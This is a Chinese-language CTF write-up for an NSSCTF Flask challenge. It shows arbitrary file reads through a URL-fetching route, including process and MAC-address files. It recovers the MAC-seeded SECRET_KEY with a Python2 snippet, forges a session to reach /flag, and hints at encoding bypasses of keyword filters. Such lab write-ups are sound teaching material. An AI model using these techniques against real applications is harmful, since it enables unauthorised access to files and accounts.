Flask任意文件读取+session伪造-NSSCTF-web4

1、打开环境，有个超链接readSomtthing，直接跳转到百度首页。

2、观察跳转URL,IP:PORT/read?url=https://baidu.com。结合提示，可能存在任意文件读取漏洞。

3、使用url= /proc/self/cmdline 读取当前进程对应的终端命令时，发现了app.py。审计代码：

# encoding:utf-8 import re, random, uuid, urllib from flask import Flask, session, request app = Flask(__name__) random.seed(uuid.getnode()) #用mac地址作为种子 app.config['SECRET_KEY'] = str(random.random() * 233) #根据上面的Mac地址，生成密钥。 app.debug = True @app.route('/') def index(): session['username'] = 'www-data' #当前用户 return 'Hello World! Read somethings' @app.route('/read') def read(): try: url = request.args.get('url') m = re.findall('^file.*', url, re.IGNORECASE) n = re.findall('flag', url, re.IGNORECASE) if m or n: return 'No Hack' res = urllib.urlopen(url) return res.read() except Exception as ex: print str(ex) return 'no response' @app.route('/flag') def flag(): if session and session['username'] == 'fuck': #需要让username = fuck，才会读取flag return open('/flag.txt').read() else: return 'Access denied' if __name__ == '__main__': app.run(debug=True, host="0.0.0.0")

可以确定，当前用户是www-data，路由为/。当用户为fuck，路由为/flag时，可以读取flag。由此，需要进行session伪造。

4、session伪造必须要知道scret_key，代码里给出了方法：

random.seed(uuid.getnode()) #用mac地址作为种子 app.config['SECRET_KEY'] = str(random.random() * 233) #根据上面的Mac地址，生成密钥。

根据url=/sys/class/net/eth0/address拿到mac地址：02:42:ac:02:16:63。开始生成scret_key（这里需要使用python2，因为这个题目的环境是2，生成密钥用3的话，长度会长一些，伪造结果不对）：

import random random.seed(0x0242ac021663) #也可以转为十进制的2485376915043 print(str(random.random()*233))

结果：10.937048099。

5、拿到scret_key之后，尝试对当前的session解密，看看对不对：

用户：www-data，说明密钥是正确的，开始伪造fuck的session：

刚开始用单引号报错，后来使用双引号正常出来session。替换、刷新、才出现flag。

6、/read路由过滤了flag、file关键字，也可以考虑编码绕过直接读取flag。